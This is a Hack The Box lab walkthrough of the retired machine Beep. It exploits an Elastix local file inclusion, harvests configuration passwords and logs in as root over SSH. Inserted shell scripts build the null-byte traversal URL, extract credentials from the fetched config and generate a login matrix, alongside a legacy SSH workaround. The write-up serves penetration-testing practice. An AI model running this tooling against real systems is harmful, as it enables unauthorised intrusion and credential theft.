Beep - HTB Walkthrough

Subashri
3 min readDec 2, 2020

This is my next blog post on my penetration testing experience, this time exploiting the retired machine Beep from Hack The Box. It is an easy Linux machine with the IP address 10.10.10.7.

The first step is reconnaissance: a port scan tells us which services are exposed and which of them might be exploitable.

The scan shows the open ports 22, 25, 80, 111, 443, 993, 1175, 1218, 3306, 3809, 4445 and 10000. SSH runs on port 22, SMTP on port 25, the Apache web server on port 80 and its HTTPS counterpart on port 443, MySQL on port 3306 and Webmin on port 10000.

Since port 80 is open, we browse to the IP address and are presented with a login page asking for credentials.

We then check the page source to see whether it gives away any additional information.

As it does not, we search for known exploits for Elastix, the product named on the login page.

To our surprise there are several, and we go through them one by one. The cross-site scripting one is of little use to us, but the PHP and LFI exploits are worth trying.

So we mirror the exploit to the local machine and read through it to gather the details.

From it we learn that Elastix 2.2.0 is vulnerable to a local file inclusion (LFI), and we note the request that triggers it.

We then view the page source of the response the exploit produces and find several usernames and passwords in it. We first try brute-forcing with hydra using them, but this does not work out.

So I noted them down manually and worked out the possible combinations of usernames and passwords. From the details on the page, the possible usernames are mysql, admin, asterisk and root, and the possible passwords are amp109, amp111, passw0rd and jEhd7ekwmdjE.
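The mechanics of that step, as an added example rather than the post's own commands: a helper that builds the traversal URL (with the trailing null byte the Elastix LFI exploit relies on), and a pair of filters that pull user and password values, commented-out ones included, out of the returned configuration and expand them into login candidates. The endpoint path and parameter name are placeholders (take the real ones from the exploit you mirrored), /etc/amportal.conf is the FreePBX configuration file the public Elastix LFI exploit reads (the post does not name the file), and the configuration text below is constructed from the values the post lists; only fetch_via_lfi needs the box to be reachable.

```shell
#!/bin/sh
# Added example, not the post's own commands (assumptions listed above).
TARGET="https://10.10.10.7"   # the box, from the post
VULN_PATH="/vulnerable.php"   # placeholder: the endpoint from the mirrored exploit goes here
VULN_PARAM="file"             # placeholder: the vulnerable parameter name goes here

# lfi_url FILE [DEPTH] -> the request URL with DEPTH levels of ../ and a trailing %00.
# PHP before 5.3.4 stops reading the include path at the NUL byte, so the traversal still
# lands on FILE even when the script appends its own suffix (such as .php) to the parameter.
lfi_url() {
  file=${1#/}; depth=${2:-8}; up=""; i=0
  while [ "$i" -lt "$depth" ]; do up="${up}../"; i=$((i + 1)); done
  printf '%s%s?%s=%s%s%%00\n' "$TARGET" "$VULN_PATH" "$VULN_PARAM" "$up" "$file"
}

# fetch_via_lfi FILE -> body of FILE as served through the include (needs the box reachable).
# -k because the appliance uses a self-signed certificate; curl sends the %00 untouched.
fetch_via_lfi() { curl -sk "$(lfi_url "$1")"; }

# harvest_credentials < config -> "KEY=value" for every key naming a user or password.
# Commented-out lines are kept on purpose: old values in an appliance config often still
# work somewhere else on the box.
harvest_credentials() {
  sed -n -E 's/^[[:space:]]*#?[[:space:]]*([A-Z_]*(USER|USERNAME|PASS|PASSWORD))[[:space:]]*=[[:space:]]*([^[:space:]]+).*$/\1=\3/p'
}

# candidate_logins < "KEY=value" lines -> every user:password pair, with root added, since the
# config never names the OS root account but its passwords are frequently reused for it.
candidate_logins() {
  awk -F= '
    $1 ~ /USER/ { u[$2] = 1 }
    $1 ~ /PASS/ { p[$2] = 1 }
    END { u["root"] = 1; for (a in u) for (b in p) print a ":" b }
  ' | sort -u
}

# Constructed sample in the shape of an amportal.conf, using the values the post lists.
SAMPLE_CONF='AMPDBHOST=localhost
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhd7ekwmdjE
AMPMGRUSER=admin
# AMPMGRPASS=amp111
AMPMGRPASS=jEhd7ekwmdjE
FOPPASSWORD=passw0rd
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=jEhd7ekwmdjE'

# Offline run on the sample. Against the box, replace the printf with:
#   fetch_via_lfi /etc/amportal.conf | harvest_credentials | candidate_logins
lfi_url /etc/amportal.conf
printf '%s\n' "$SAMPLE_CONF" | harvest_credentials | candidate_logins
```

The candidate list is deliberately the full user-by-password matrix: a config file tells you which passwords exist on the box, not which account they were reused for, and on this machine the one that matters ends up paired with an account the file never mentions.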

Connecting over SSH the ordinary way was not feasible, so I tried a workaround from StackOverflow for the key exchange algorithm settings.
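The workaround, as an added example (not the command from the post or from StackOverflow): OpenSSH names the exact algorithm class it could not agree on in its "Unable to negotiate ... Their offer:" error, so this helper turns that error into the matching -o override and, optionally, a per-host ~/.ssh/config stanza. The target 10.10.10.7 is the post's; the two error lines are constructed in the shape of OpenSSH's message (the two errors such a client reports, one per reconnect), not captured from the box.

```shell
#!/bin/sh
# Added example, not the post's (or StackOverflow's) command; assumptions listed above.

# legacy_ssh_opts < ssh error text -> one "-oOption=+algs" line per "no matching ... found"
# message, re-enabling exactly the algorithms the server offered. The "+" keeps the client's
# own defaults and appends the legacy ones, instead of replacing the whole list.
legacy_ssh_opts() {
  sed -n -E 's/.*no matching (key exchange method|host key type|cipher|MAC) found\. Their offer: ([^[:space:]]+).*/\1|\2/p' |
  while IFS='|' read -r kind algs; do
    case "$kind" in
      "key exchange method") opt=KexAlgorithms ;;
      "host key type")       opt=HostKeyAlgorithms ;;
      cipher)                opt=Ciphers ;;
      MAC)                   opt=MACs ;;
      *)                     continue ;;
    esac
    printf '%s\n' "-o$opt=+$algs"
  done
}

# legacy_ssh_cmd USER HOST < ssh error text -> the command line to retry with.
legacy_ssh_cmd() {
  opts=$(legacy_ssh_opts | tr '\n' ' ')
  printf 'ssh %s%s@%s\n' "$opts" "$1" "$2"
}

# legacy_ssh_config ALIAS HOST USER < ssh error text -> a Host stanza for ~/.ssh/config,
# so that a plain "ssh ALIAS" works and the weak algorithms stay scoped to this one host.
legacy_ssh_config() {
  printf 'Host %s\n    HostName %s\n    User %s\n' "$1" "$2" "$3"
  legacy_ssh_opts | sed -E 's/^-o([A-Za-z]+)=/    \1 /'
}

# Constructed sample errors in the shape of OpenSSH's message (not captured from the box):
# a client that has dropped SHA-1 key exchange and RSA/DSA host keys, talking to a server
# that offers nothing else.
SAMPLE_ERRORS='Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
Unable to negotiate with 10.10.10.7 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss'

printf '%s\n' "$SAMPLE_ERRORS" | legacy_ssh_cmd root 10.10.10.7
printf '%s\n' "$SAMPLE_ERRORS" | legacy_ssh_config beep 10.10.10.7 root
```

Only re-enable these algorithms for this host: diffie-hellman-group1-sha1 and ssh-dss are offered because the server is old, not because they are safe, so keep the override in a Host stanza rather than in a global Host * block. If your client is new enough to have removed an algorithm entirely (ssh -Q kex and ssh -Q key list what it still carries), the + syntax cannot bring it back and you need an older client.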

To our surprise, the username root with the password jEhd7ekwmdjE was valid: we got connected, and a first ls showed the root flag.

The machine is compromised!!!

Navigating through the home directories, we find two users, fanis and spamfilter. In fanis's home directory we find the user flag as well.

Hurray!! The Machine is pwned!!!
